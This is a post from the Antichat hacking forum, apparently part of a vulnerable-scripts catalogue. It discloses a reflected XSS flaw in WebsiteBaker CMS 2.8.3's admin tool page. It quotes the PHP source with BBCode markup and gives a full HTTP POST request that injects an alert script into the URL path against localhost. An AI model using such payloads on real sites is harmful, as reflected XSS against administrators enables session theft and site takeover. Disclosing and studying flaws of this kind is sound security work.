ANTICHAT - Показать сообщение отдельно - Энциклопедия уязвимых скриптов

CMS WebsiteBaker

Version 2.8.3 - последняя версия!

Официальный сайт http://www.websitebaker.org

passive XSS (reflected)

Требования: права администратора

Уязвимый сценарий:admin/admintools/tool.php

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"]$doSave[/COLOR][COLOR="#007700"]= (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'save_settings'[/COLOR][COLOR="#007700"]]) || (isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'action'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'action'[/COLOR][COLOR="#007700"]]) ==[/COLOR][COLOR="#DD0000"]'save'[/COLOR][COLOR="#007700"]));

[/COLOR][COLOR="#FF8000"]// test for valid tool name

[/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/^[a-z][a-z_\-0-9]{2,}$/i'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$toolDir[/COLOR][COLOR="#007700"])) {

[/COLOR][COLOR="#FF8000"]// Check if tool is installed

[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'SELECT `name` FROM `'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]TABLE_PREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'addons` '[/COLOR][COLOR="#007700"].

[/COLOR][COLOR="#DD0000"]'WHERE `type`=\'module\' AND `function`=\'tool\' '[/COLOR][COLOR="#007700"].

[/COLOR][COLOR="#DD0000"]'AND `directory`=\''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$toolDir[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'\''[/COLOR][COLOR="#007700"];

        if(([/COLOR][COLOR="#0000BB"]$toolName[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$database[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]get_one[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]))) {

[/COLOR][COLOR="#FF8000"]// create admin-object and print header if FTAN is NOT supported AND function 'save' is requested

[/COLOR][COLOR="#0000BB"]$admin_header[/COLOR][COLOR="#007700"]= !([/COLOR][COLOR="#0000BB"]is_file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]WB_PATH[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/modules/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$toolDir[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/FTAN_SUPPORTED'[/COLOR][COLOR="#007700"]) &&[/COLOR][COLOR="#0000BB"]$doSave[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$admin[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]admin[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'admintools'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'admintools'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$admin_header[/COLOR][COLOR="#007700"]);

            if(![/COLOR][COLOR="#0000BB"]$doSave[/COLOR][COLOR="#007700"]) {

[/COLOR][COLOR="#FF8000"]// show title if not function 'save' is requested

[/COLOR][COLOR="#007700"]print[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].

[/COLOR][COLOR="#0000BB"]$HEADING[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'ADMINISTRATION_TOOLS'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].

[/COLOR][COLOR="#DD0000"]'&nbsp;&raquo;&nbsp;'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$toolName[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"\n"[/COLOR][COLOR="#007700"];

            }

[/COLOR][COLOR="#FF8000"]// include modules tool.php

[/COLOR][COLOR="#007700"]require([/COLOR][COLOR="#0000BB"]WB_PATH[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/modules/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$toolDir[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/tool.php'[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$admin[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]print_footer[/COLOR][COLOR="#007700"]();

        }else {

[/COLOR][COLOR="#FF8000"]// no installed module found, jump to index.php of admintools

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'location: '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ADMIN_URL[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/admintools/index.php'[/COLOR][COLOR="#007700"]);

            exit([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);

        }

    }else {

[/COLOR][COLOR="#FF8000"]// invalid module name requested, jump to index.php of admintools

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'location: '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ADMIN_URL[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/admintools/index.php'[/COLOR][COLOR="#007700"]);

        exit([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);

    }[/COLOR][/COLOR]

Exploit:

Цитата:

Сообщение от None

POST /wsb/admin/admintools/tool.php/
">alert(1)
?tool=SecureFormSwitcher HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wsb/admin/admintools/tool.php?tool=SecureFormSwitcher
Cookie: vc=12; wb_session_id=par1; wb_5773_session_id=par2; PHPSESSID=par3
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 111
par=par_par&singletab=true&ftan_switch=&save_setti ngs=Accept&fingerprint_with_ip_octets=2